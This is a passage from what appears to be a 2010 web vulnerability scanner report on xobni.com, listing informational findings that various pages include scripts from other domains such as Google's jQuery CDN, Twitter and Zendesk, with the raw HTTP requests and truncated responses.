<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.107. http://www.xobni.com/plus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /plus

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Plus - Rech
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.108. http://www.xobni.com/press/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.109. http://www.xobni.com/press/05202010_german_release.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/05202010_german_release.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/05202010_german_release.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14896

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.110. http://www.xobni.com/press/09022010_harris_survey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/09022010_harris_survey

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/09022010_harris_survey HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.111. http://www.xobni.com/press/10282010_french_release.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/10282010_french_release.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/10282010_french_release.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.112. http://www.xobni.com/press/coverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/coverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/coverage HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 178670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.113. http://www.xobni.com/press/logos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/logos

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/logos HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/trademarks
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12628

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.114. http://www.xobni.com/press/releases

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/releases

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press/releases HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.115. http://www.xobni.com/press/testimonials

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /press/testimonials

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /press/testimonials HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/learnmore/video
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.5.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 14533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Testimonial
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</style>
           <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

12.116. http://www.xobni.com/products

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/download
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.3.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9142

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.117. http://www.xobni.com/relationship-management

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /relationship-management

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /relationship-management HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11932

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Outlook Relations
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.118. http://www.xobni.com/salesforce

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /salesforce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /salesforce HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=fr
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13054

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Salesforce in Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.119. http://www.xobni.com/salesforce-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /salesforce-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /salesforce-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Salesforce in Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.120. http://www.xobni.com/search-conversations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /search-conversations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search-conversations HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Search Conversati
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.121. http://www.xobni.com/search-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /search-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Search Outlook wi
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.122. http://www.xobni.com/social-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /social-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13039

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for Microso
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.123. http://www.xobni.com/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.10.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 200143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Xobni Sup
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

12.124. http://www.xobni.com/support/contact_form

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/contact_form

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/contact_form HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>Contact</TITLE>
   <link rel='stylesheet' href='/csscache/1256842155/style
...[SNIP]...
<!-- Must include trailing script end tag or thickbox js breaks -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.125. http://www.xobni.com/support/index.php

Summary

Severity:   Information
